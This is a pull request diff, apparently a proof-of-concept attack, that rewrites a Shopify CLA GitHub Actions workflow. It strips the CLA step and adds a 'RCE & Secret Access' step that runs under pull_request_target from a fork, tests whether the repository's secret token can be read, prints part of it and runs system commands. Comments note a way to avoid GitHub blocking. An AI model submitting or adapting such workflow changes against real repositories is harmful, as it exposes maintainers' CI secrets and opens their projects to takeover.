poc: verify pull_request_target with actions write

Author: Quang989104

.github/workflows/cla.yaml

@@ -28,19 +28,18 @@ jobs:
     permissions:
       actions: write # to re-trigger workflows
       pull-requests: write # to add/remove labels
-    steps:
-      - uses: Shopify/shopify-cla-action@9938f4b43524d1cfa7471ce9a803edf226697284 # v1.8.0
-        with:
-          github-token: ${{ secrets.token }}
-          cla-token: ${{ secrets.cla-token }}
-      - name: Proof of Concept Impact
-        env:
-          # Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
-          GH_TOKEN: ${{ secrets.token }}
+      steps:
+      - name: Proof of Concept - RCE & Secret Access
         run: |
-          curl -L -X POST \
-          -H "Authorization: Bearer $GH_TOKEN" \
-          -H "Accept: application/vnd.github+json" \
-          "https://github.com{{ github.event.pull_request.number }}/comments" \
-          -d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'
+          echo "=== EVIDENCE START ==="
+          echo "Checking Repository: ${{ github.repository }}"
+          echo "Checking Actor: ${{ github.actor }}"
+          # Kiểm tra xem Token có tồn tại không mà không làm lộ giá trị (tránh bị GitHub Block)
+          if [ -n "${{ secrets.token }}" ]; then
+            echo "SUCCESS: Secret 'token' is accessible from this Forked PR!"
+            echo "Token mask check: ${{ secrets.token }}" | cut -c 1-15
+          fi
+          echo "Current Path: $(pwd)"
+          echo "System User: $(whoami)"
+          echo "=== EVIDENCE END ==="